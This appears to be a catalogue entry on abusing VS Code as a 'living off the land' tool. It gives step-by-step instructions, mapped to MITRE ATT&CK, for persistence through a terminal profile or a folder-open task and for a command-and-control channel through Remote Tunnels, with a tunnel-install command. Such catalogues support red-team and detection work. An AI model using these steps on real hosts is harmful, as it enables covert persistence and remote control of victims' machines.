.. / VS Code
Star

Visual Studio Code, also commonly referred to as VS Code, is a source-code editor made by Microsoft with the Electron Framework, for Windows, Linux and macOS.


Resources:
Acknowledgements:

Persistence

Steps to create a VS Code terminal persistence profile
		    Override/Create a workspace/settings.json config. Add a new terminal profile with the payload in the "path" and "args" parameters. Set the new terminal profile as default.
		
Usecase: Establishing persistence on a Windows host
Privileges required: User
MITRE ATT&CK®: T1546

Steps to create and enable a VS Code task for persitence
		    Create/Modify a task in a .code-workspace file, or a tasks.json file inside a .vscode folder. Add a new task with the payload in the 'command' or 'args' parameters. Add one of the possible triggers: 'runOption' parameter with value of 'folderOpen' or shortcut keys in the keybindings.json file.
		
Usecase: Establishing persistence on a Windows host
Privileges required: User
MITRE ATT&CK®: T1546

C2 Channel

Steps to create and enable a VS Code Remote Tunnel as C2 service
		    Use '.\code.exe tunnel service install --no-sleep' from CLI and authorize yourself on source host with the 6 digit code or use 'Turn on Remote Tunnel Access' option in the VS Code GUI account menu and authorize yourself in the browser of target host. Then you'll get a link such as: https://vscode.dev/tunnel/<victim's hostname>/<directory>. Open this link in browser and authorize yourself on source host with the same Github/Microsoft account. Once you connect with this link, an SSH connection will be created over the tunnel in order to provide end-to-end encryption.
		
Usecase: Establishing C2 Channel on a Windows host
Privileges required: User
MITRE ATT&CK®: T1071